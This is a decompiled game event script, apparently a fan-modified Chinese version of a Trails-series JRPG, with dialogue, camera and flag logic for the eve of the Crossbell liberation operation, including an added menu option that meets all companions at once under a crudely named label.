"#11P#10404F呵呵,我知道啦。\x02\x03", "#10400F我喝完酒才会过去,\x01", "你不用着急哦。\x02", ) ) CloseMessageWindow() OP_5A() Call(0, 27) SetScenarioFlags(0x1AA, 7) Jump("loc_5B5E") label("loc_5B01") ChrTalk( 0xA, ( "#11P#10405F……这样吗?\x01", "那也无所谓……\x02\x03", "#10404F呵呵,如果你改变主意了,\x01", "就再来找我吧。\x02", ) ) CloseMessageWindow() OP_5A() label("loc_5B5E") SetChrSubChip(0xA, 0x0) SetChrSubChip(0x8, 0x0) EventEnd(0x5) Return() # Function_26_52F2 end def Function_27_5B69(): pass label("Function_27_5B69") FadeToDark(500, 0, -1) OP_0D() Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_END)), "loc_5C0E") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向艾莉道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向艾莉道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 3) Jump("loc_5F75") label("loc_5C0E") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_END)), "loc_5CA8") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向缇欧道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向缇欧道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 4) Jump("loc_5F75") label("loc_5CA8") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_END)), "loc_5D42") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向兰迪道歉,\x01", " 告诉他我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向兰迪道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 5) Jump("loc_5F75") label("loc_5D42") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_END)), "loc_5DE0") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向诺艾尔道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向诺艾尔道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 6) Jump("loc_5F75") label("loc_5DE0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_END)), "loc_5E7A") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向瓦吉道歉,\x01", " 告诉他我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向瓦吉道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AA, 7) Jump("loc_5F75") label("loc_5E7A") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_END)), "loc_5F14") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00006F(……必须去向莉夏道歉,\x01", " 告诉她我不能赴约了。)\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "罗伊德向莉夏道了歉,\x01", "取消了之前的约定。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ClearScenarioFlags(0x1AB, 0) Jump("loc_5F75") label("loc_5F14") SetMessageWindowPos(-1, -1, -1, -1) AnonymousTalk( 0x101, ( "#00003F(……在休息室做好\x01", " 明天必要的准备工作之后,\x01", " 就去甲板吧。)\x02", ) ) CloseMessageWindow() OP_5A() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) label("loc_5F75") Return() # Function_27_5B69 end def Function_28_5F76(): pass label("Function_28_5F76") TalkBegin(0xFF) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_OR), scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_OR), scpexpr(EXPR_END)), "loc_6571") EventBegin(0x0) Fade(500) SetChrPos(0x101, 1420, 0, -92300, 90) OP_68(2300, 1000, -92050, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(19000, 0) OP_0D() Sleep(300) Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 3)), scpexpr(EXPR_END)), "loc_6092") ChrTalk( 0x101, ( "#00005F#6P(对了……之前和艾莉有约,\x01", " 得去甲板和她谈一些事情。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_6092") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 4)), scpexpr(EXPR_END)), "loc_6142") ChrTalk( 0x101, ( "#00005F#6P(对了……缇欧有事想和我商量,\x01", " 得去甲板和她碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_6142") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 5)), scpexpr(EXPR_END)), "loc_61F0") ChrTalk( 0x101, ( "#00005F#6P(对了……兰迪有话想和我说,\x01", " 得去甲板和他碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_61F0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 6)), scpexpr(EXPR_END)), "loc_62A0") ChrTalk( 0x101, ( "#00005F#6P(对了……诺艾尔有事想拜托我,\x01", " 得去甲板和她碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_62A0") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AA, 7)), scpexpr(EXPR_END)), "loc_635C") ChrTalk( 0x101, ( "#00005F#6P(对了……瓦吉刚才说了一些很令人\x01", " 在意的话,得去甲板和他碰面。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() Jump("loc_6405") label("loc_635C") Jc((scpexpr(EXPR_TEST_SCENA_FLAGS, MakeScenarioFlags(0x1AB, 0)), scpexpr(EXPR_END)), "loc_6405") ChrTalk( 0x101, ( "#00005F#6P(对了……之前和莉夏有约,\x01", " 得去甲板上和她聊聊。)\x02\x03", "#00003F(…………………………………)\x02\x03", "#00000F(……如何?\x01", " 要先把明天的准备工作完成吗?)\x02", ) ) CloseMessageWindow() label("loc_6405") Sound(814, 0, 100, 0) FadeToDark(300, 0, 100) SetMessageWindowPos(-1, -1, -1, -1) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "一旦结束自由行动,本日就会结束,\x01", "剧情也会自动进展,敬请注意。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Sleep(300) ''' Menu( 0, -1, -1, 0, ( "【还有其它事情】\x01", # 0 "【结束自由行动,去和约见的同伴会面】\x01", # 1 ) ) MenuEnd(0x0) ''' optlist = \ [ '【还有其它事情】', '【结束自由行动,去和约见的同伴会面】', '【结束自由行动,依次和所有后宫会面】', ] CreateMenuAndShow(optlist) OP_60(0x0) Switch( (scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_END)), (0, "loc_64D1"), (1, "loc_64D6"), (2, "fuck_all_member"), (SWITCH_DEFAULT, "loc_6558"), ) label('fuck_all_member') StopSound(498, 1500, 70) FadeToDark(1500, 0, -1) OP_0D() OP_21(0xFA0) WaitBGM() SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "之后,罗伊德为明日的解放作战做好了\x01", "必要的准备工作,来到了夜幕笼罩下的甲板。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetScenarioFlags(0x22, 0) SetScenarioFlags(0x1AA, 3) SetScenarioFlags(0x1AA, 4) SetScenarioFlags(0x1AA, 5) SetScenarioFlags(0x1AA, 6) SetScenarioFlags(0x1AA, 7) SetScenarioFlags(0x1AB, 0) NewScene("e440c", 0, 0, 0) IdleLoop() Jump("loc_6558") label("loc_64D1") Jump("loc_6558") label("loc_64D6") StopSound(498, 1500, 70) FadeToDark(1500, 0, -1) OP_0D() OP_21(0xFA0) WaitBGM() SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "之后,罗伊德为明日的解放作战做好了\x01", "必要的准备工作,来到了夜幕笼罩下的甲板。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetScenarioFlags(0x22, 0) NewScene("e440B", 0, 0, 0) IdleLoop() Jump("loc_6558") label("loc_6558") OP_5A() SetChrPos(0x0, 550, 0, -92390, 270) EventEnd(0x5) Jump("loc_686D") label("loc_6571") ChrTalk( 0x101, ( "#00005F(……今天是不是\x01", " 应该早点休息呢?)\x02\x03", "#00003F(但明天就要展开作战了,\x01", " 还是去确认一下大家的\x01", " 状态为好……)\x02", ) ) CloseMessageWindow() Sound(814, 0, 100, 0) FadeToDark(300, 0, 100) SetMessageWindowPos(-1, -1, -1, -1) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "如果选择在休息室休息,\x01", "本日就会结束,剧情也会\x01", "自动进展,敬请注意。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) FadeToBright(300, 0) Sleep(300) Menu( 0, -1, -1, 1, ( "【还有其它事情】\x01", # 0 "【结束自由行动,入内休息】\x01", # 1 ) ) MenuEnd(0x0) OP_60(0x0) OP_57(0x0) OP_5A() Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_66BD") Jump("loc_686D") label("loc_66BD") Jc((scpexpr(EXPR_GET_RESULT, 0x0), scpexpr(EXPR_PUSH_LONG, 0x1), scpexpr(EXPR_EQU), scpexpr(EXPR_END)), "loc_686D") EventBegin(0x0) Fade(500) OP_68(2040, 1000, -91940, 0) MoveCamera(45, 25, 0, 0) OP_6E(500, 0) SetCameraDistance(20000, 0) SetChrPos(0x101, 1300, 0, -92030, 90) CreatePortrait(1, 0, 8, 480, 264, 0, 0, 512, 256, 0, 0, 480, 256, 0xFFFFFF, 0x0, "c_vis416.itp") OP_0D() Sleep(300) ChrTalk( 0x101, ( "#00003F#6P(……先在休息室做一番准备,\x01", " 然后就直接休息吧。)\x02\x03", "#00001F(解放克洛斯贝尔市的作战就在明天……\x01", " 无论如何也要取得成功!)\x02", ) ) CloseMessageWindow() Sound(100, 0, 100, 0) OP_74(0x3, 0x1E) OP_71(0x3, 0x0, 0xA, 0x1, 0x8) Sleep(500) def lambda_67EB(): OP_95(0xFE, 4300, 0, -92030, 1000, 0x0) ExitThread() QueueWorkItem(0x101, 1, lambda_67EB) Sleep(1000) StopSound(498, 2000, 70) FadeToDark(1000, 0, -1) OP_0D() EndChrThread(0x101, 0x1) OP_21(0xFA0) WaitBGM() Sleep(1000) Sound(13, 0, 100, 0) Sleep(4000) OP_CB(0x1, 0x3, 0xFFFFFFFF, 0x1F4, 0x0, 0x0) OP_CC(0x0, 0x1, 0x3) Sleep(2000) OP_CB(0x1, 0x3, 0xFFFFFF, 0x1F4, 0x0, 0x0) OP_CC(0x0, 0x1, 0x3) OP_CC(0x1, 0xFF, 0x0) SetScenarioFlags(0x23, 1) NewScene("e4300", 0, 0, 0) IdleLoop() EventEnd(0x3) label("loc_686D") TalkEnd(0xFF) Return() # Function_28_5F76 end def Function_29_6871(): pass label("Function_29_6871") EventBegin(0x0) FadeToDark(0, 0, -1) SetChrPos(0x0, -150, 0, -88230, 180) EventEnd(0x5) Return() # Function_29_6871 end def Function_30_6891(): pass label("Function_30_6891") EventBegin(0x0) FadeToDark(0, 0, -1) LoadChrToIndex("apl/ch50203.itc", 0x1E) LoadChrToIndex("chr/ch06902.itc", 0x1F) LoadChrToIndex("chr/ch06000.itc", 0x20) LoadChrToIndex("chr/ch05800.itc", 0x21) SoundLoad(943) Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x4)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68CB") AddParty(0x4, 0xFF, 0xFF) label("loc_68CB") Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x8)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68DE") AddParty(0x8, 0xFF, 0xFF) label("loc_68DE") Jc((scpexpr(EXPR_EXEC_OP, "GetPartyIndex(0x5)"), scpexpr(EXPR_PUSH_LONG, 0x0), scpexpr(EXPR_LSS), scpexpr(EXPR_END)), "loc_68F1") AddParty(0x5, 0xFF, 0xFF) label("loc_68F1") ClearChrFlags(0x4, 0x80) ClearChrBattleFlags(0x4, 0x8000) ClearChrFlags(0x5, 0x80) ClearChrBattleFlags(0x5, 0x8000) ClearChrFlags(0x6, 0x80) ClearChrBattleFlags(0x6, 0x8000) SetChrFlags(0x10, 0x80) SetChrFlags(0xB, 0x80) SetChrFlags(0xE, 0x80) SetChrFlags(0xF, 0x80) SetChrFlags(0xA, 0x80) SetChrFlags(0xD, 0x80) ClearChrFlags(0xC, 0x80) ClearChrFlags(0x8, 0x80) ClearChrFlags(0x13, 0x80) ClearChrFlags(0x11, 0x80) ClearChrFlags(0x12, 0x80) SetChrFlags(0x105, 0x4) SetChrChipByIndex(0x105, 0x3) SetChrSubChip(0x105, 0x2) ClearChrFlags(0x9, 0x80) SetChrChipByIndex(0x9, 0x1E) SetChrSubChip(0x9, 0x0) OP_4B(0xC, 0xFF) ClearChrFlags(0xC, 0x80) SetChrFlags(0xC, 0x8000) SetChrFlags(0xC, 0x4) SetChrChipByIndex(0xC, 0x1F) SetChrSubChip(0xC, 0x0) ClearChrFlags(0x12, 0x80) ClearChrBattleFlags(0x12, 0x4) SetChrFlags(0x12, 0x8000) SetChrChipByIndex(0x12, 0x20) SetChrSubChip(0x12, 0x0) ClearChrFlags(0x11, 0x80) ClearChrBattleFlags(0x11, 0x4) SetChrFlags(0x11, 0x8000) SetChrChipByIndex(0x11, 0x21) SetChrSubChip(0x11, 0x0) SetChrSubChip(0x13, 0x5) ClearMapObjFlags(0x1, 0x4) SetMapObjFlags(0x1, 0x1000) OP_74(0x1, 0x14) OP_70(0x1, 0x24) Sleep(1000) SetChrName("") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "就这样,牢不可破、笼罩着整个\x01", "克洛斯贝尔市的『结界』消失了。\x02\x03", "罗伊德等人与『黑月』的曹,\x01", "以及反抗组织的米蕾优等人取得了联系……\x02\x03", "而索妮亚司令也作出了保证,\x01", "贝尔加德门和唐古拉姆门的\x01", "部队将会保持中立。\x02\x03", "入夜之后……\x02\x03", "众人在梅尔卡瓦的舰桥上\x01", "接到了凯文神父发来的联络。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetChrPos(0x9, -3150, -1350, 7150, 315) SetChrPos(0x13, 2900, 0, -850, 0) SetChrPos(0x11, -3300, 0, 250, 45) SetChrPos(0x12, -3800, 0, -1000, 45) SetChrPos(0x8, 0, -1350, 6700, 0) SetChrPos(0xC, 3000, -1350, 6960, 45) SetChrPos(0x101, -750, 250, 200, 0) SetChrPos(0x102, 0, 0, -450, 0) SetChrPos(0x104, 650, 0, -1250, 0) SetChrPos(0x105, 0, 500, 2400, 0) SetChrPos(0x103, -1460, 0, -1190, 0) SetChrPos(0x109, -700, 0, -1770, 0) SetChrPos(0x106, 200, 0, -2200, 0) PlayBGM("ed7583", 0) Sound(498, 1, 80, 0) FadeToBright(1000, 0) OP_68(660, 800, 3830, 0) MoveCamera(44, 18, 0, 0) OP_6E(500, 0) SetCameraDistance(21500, 0) SetCameraDistance(22500, 2000) OP_0D() OP_6F(0x79) Sleep(300) SetMessageWindowPos(95, 70, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "也就是说,\x01", "我们就算进入克洛斯贝尔的领空,\x01", "也不会有遭到攻击的危险吧?\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, ( "#10403F#6P嗯,那些神机似乎\x01", "都在专心守卫都市。\x02\x03", "#10400F只要不接近克洛斯贝尔市,\x01", "应该就不会有问题。\x02", ) ) CloseMessageWindow() SetMessageWindowPos(90, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "很好,这样一来,\x01", "总算是有点眉目了……\x02\x03", "天亮之后,我就会返回你们那边。\x02\x03", "至于具体的行动时机,\x01", "就等我们到了之后再商量吧。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, "#10402F#6P呵呵,明白了。\x02", ) CloseMessageWindow() SetMessageWindowPos(190, -1, -1, -1) SetChrName("莉丝的声音") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "#2S……凯文,换我说几句。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Fade(250) OP_70(0x1, 0x1F) Sound(73, 0, 100, 0) OP_0D() Sleep(300) ChrTalk( 0x102, "#00102F#12P莉丝小姐……\x02", ) CloseMessageWindow() SetMessageWindowPos(160, -1, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "……艾莉小姐,\x01", "你能平安无事,真是太好了。\x02\x03", "还有罗伊德警官和各位,\x01", "你们也一样。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x101, "#00002F#12P哈哈,托你们的福。\x02", ) CloseMessageWindow() ChrTalk( 0x104, ( "#00309F#12P哎呀~真没想到会以这种形式\x01", "和莉丝小姐交谈啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x103, ( "#00202F#12P#N你们会为我们的\x01", "突入作战提供协助吧?\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(140, 70, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "是的,我们准备用\x01", "这架梅尔卡瓦来吸引\x01", "那些保护都市的神机。\x02\x03", "不过,这样就不能同时对付\x01", "猎兵和国防军了……\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x101, ( "#00004F#12P……这就足够了,\x01", "真是帮了我们的大忙。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#00106F#12P莉丝小姐、凯文神父,\x01", "真不知道该怎么感谢你们……\x02", ) ) CloseMessageWindow() SetMessageWindowPos(90, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "好啦,道谢的话,\x01", "还是留到作战成功之后再说吧。\x02\x03", "其实我们还打算\x01", "带来几个帮手……\x02\x03", "但即使如此,面对那些智能兵器,\x01", "恐怕还是没有什么胜算。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x103, "#00208F#12P#N的确……\x02", ) CloseMessageWindow() OP_57(0x0) OP_5A() ChrTalk( 0x104, ( "#00301F#12P总之,\x01", "你们千万不要太过逞强。\x02", ) ) CloseMessageWindow() SetMessageWindowPos(105, -1, -1, -1) SetChrName("凯文神父") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "哈哈,多谢关心。\x02\x03", "瓦吉,\x01", "我们明天早上见。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) ChrTalk( 0x105, "#10400F#6P嗯,我等你们。\x02", ) CloseMessageWindow() SetMessageWindowPos(180, -1, -1, -1) SetChrName("莉丝修女") AnonymousTalk( 0xFF, ( scpstr(0x7, 0x5), "诸位再见。\x07\x00\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) Fade(250) OP_70(0x1, 0x1E) Sound(73, 0, 100, 0) OP_0D() Sleep(500) Sound(943, 2, 60, 0) OP_71(0x1, 0x2F, 0x4C, 0x0, 0x8) OP_68(-340, 800, 2640, 2000) MoveCamera(40, 22, 0, 2000) OP_6E(500, 2000) SetCameraDistance(22440, 2000) Sleep(1000) SetChrFlags(0x13, 0x20) def lambda_721E(): TurnDirection(0x11, 0x101, 500) ExitThread() QueueWorkItem(0x11, 0, lambda_721E) Sleep(50) def lambda_722E(): TurnDirection(0x12, 0x101, 500) ExitThread() QueueWorkItem(0x12, 0, lambda_722E) Sleep(50) def lambda_723E(): TurnDirection(0x13, 0x101, 500) ExitThread() QueueWorkItem(0x13, 0, lambda_723E) Sleep(50) WaitChrThread(0x11, 0) WaitChrThread(0x12, 0) WaitChrThread(0x13, 0) OP_6F(0x79) ClearChrFlags(0x13, 0x20) OP_24(0x3AF) Sound(143, 0, 50, 0) Sleep(500) ChrTalk( 0x11, ( "#02501F#5P唔,看来明天\x01", "将会是艰辛的一天啊。\x02", ) ) CloseMessageWindow() ChrTalk( 0x12, ( "#02106F#6P#N是啊……\x01", "单看地面战力的差距,\x01", "也是总统一派占据上风。\x02\x03", "#02101F更麻烦的是,那些智能兵器\x01", "简直强得离谱。\x02", ) ) CloseMessageWindow() OP_57(0x0) OP_5A() ChrTalk( 0x106, ( "#10708F#12P据约鲁古大师说,\x01", "那架白色机体已经失去了\x01", "『消灭空间』的能力……\x02\x03", "#10701F不过,它的基础性能\x01", "却没有丝毫减弱吧?\x02", ) ) CloseMessageWindow() SetChrSubChip(0x8, 0x1) Sleep(100) ChrTalk( 0x8, ( "#12100F#5P嗯,恐怕\x01", "正如你所说。\x02\x03", "看来有必要驾驶这艘九号机,\x01", "去探查一下白色机体的状况。\x02", ) ) CloseMessageWindow() ChrTalk( 0x105, ( "#10403F#5P不管怎么说,都市周边一带\x01", "肯定会陷入胶着状态。\x02\x03", "#10401F而整个作战的关键,\x01", "就掌握在我们这些潜入队员的手中。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00003F#12P嗯,我明白。\x02\x03", "#00013F……必须要想办法潜入市内,\x01", "与科长和达德利警官\x01", "他们会合。\x02", ) ) CloseMessageWindow() ChrTalk( 0x104, ( "#00306F#11P话说回来,他们不要紧吧?\x02\x03", "#00301F听说和达德利警官的联络\x01", "在中途断开了。\x02", ) ) CloseMessageWindow() SetChrSubChip(0x9, 0x1) Sleep(200) ChrTalk( 0x9, ( "#02305F#5P多半是被通讯终端\x01", "强行切断了信号。\x02\x03", "#02303F终端拥有令特定的艾尼格玛号码\x01", "无法收发信号的机能。\x02", ) ) CloseMessageWindow() SetChrSubChip(0xC, 0x2) Sleep(100) ChrTalk( 0xC, ( "#01901F#5P也就是说,总统一派的人\x01", "在市内可以随意联络,\x01", "而我们却不可以……?\x02", ) ) CloseMessageWindow() ChrTalk( 0x103, ( "#00203F#12P是的,所以我们要\x01", "控制住通讯终端。\x02\x03", "#00208F但通讯终端设置在兰花塔内,\x01", "恐怕无法轻易得手……\x02", ) ) CloseMessageWindow() ChrTalk( 0x109, ( "#10101F#12P总而言之……\x01", "成败与否,全都要看明天早上。\x02", ) ) CloseMessageWindow() ChrTalk( 0x102, ( "#00103F#12P嗯……\x01", "为了夺回琪雅……\x02\x03", "#00101F我们无论如何也要在\x01", "『解放克洛斯贝尔市作战』中取得成功。\x02", ) ) CloseMessageWindow() ChrTalk( 0x101, ( "#00006F#11P没错……大家今晚要\x01", "好好休息,养精蓄锐。\x02", ) ) CloseMessageWindow() OP_93(0x101, 0xB4, 0x1F4) Sleep(300) ChrTalk( 0x101, ( "#00004F#5P船内有休息室,\x01", "如果累了,可以去里面休息。\x02\x03", "#00000F就让我们以最完美的状态……\x01", "共同迎接明天的早晨吧!\x02", ) ) CloseMessageWindow() Sleep(500) OP_82(0xC8, 0x0, 0xBB8, 0x1F4) SetMessageWindowPos(290, 50, -1, -1) SetChrName("众人") AnonymousTalk( 0xFF, "#4S好!\x02", ) CloseMessageWindow() OP_57(0x0) OP_5A() SetMessageWindowPos(14, 280, 60, 3) SetCameraDistance(22940, 2000) StopSound(498, 2000, 80) FadeToDark(1000, 0, -1) OP_0D() OP_32(0xFF, 0xF9, 0x0) PartySelect(1) ClearChrFlags(0x105, 0x4) ClearParty() AddParty(0x0, 0xFF, 0xFF) SetScenarioFlags(0x1A5, 2) OP_29(0xB0, 0x4, 0x10) OP_29(0xB1, 0x4, 0x2) OP_29(0xB1, 0x1, 0x0) Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x79), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_783B") OP_50(0x65, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_783B") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7A), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7852") OP_50(0x66, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7852") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7B), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7869") OP_50(0x67, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7869") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7D), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7880") OP_50(0x68, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7880") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7C), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_7897") OP_50(0x69, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_7897") Jc((scpexpr(EXPR_PUSH_VALUE_INDEX, 0x7E), scpexpr(EXPR_PUSH_LONG, 0x3), scpexpr(EXPR_GE), scpexpr(EXPR_END)), "loc_78AE") OP_50(0x6A, (scpexpr(EXPR_PUSH_LONG, 0x2), scpexpr(EXPR_ADD_SAVE), scpexpr(EXPR_END))) label("loc_78AE") OP_21(0xFA0) WaitBGM() Sleep(10) PlayBGM("ed7513", 0) OP_50(0x1, (scpexpr(EXPR_PUSH_LONG, 0x201), scpexpr(EXPR_STUB), scpexpr(EXPR_END))) Sound(498, 1, 80, 0) OP_24(0x3AF) Sleep(500) SetScenarioFlags(0x22, 2) NewScene("e302B", 101, 0, 0) 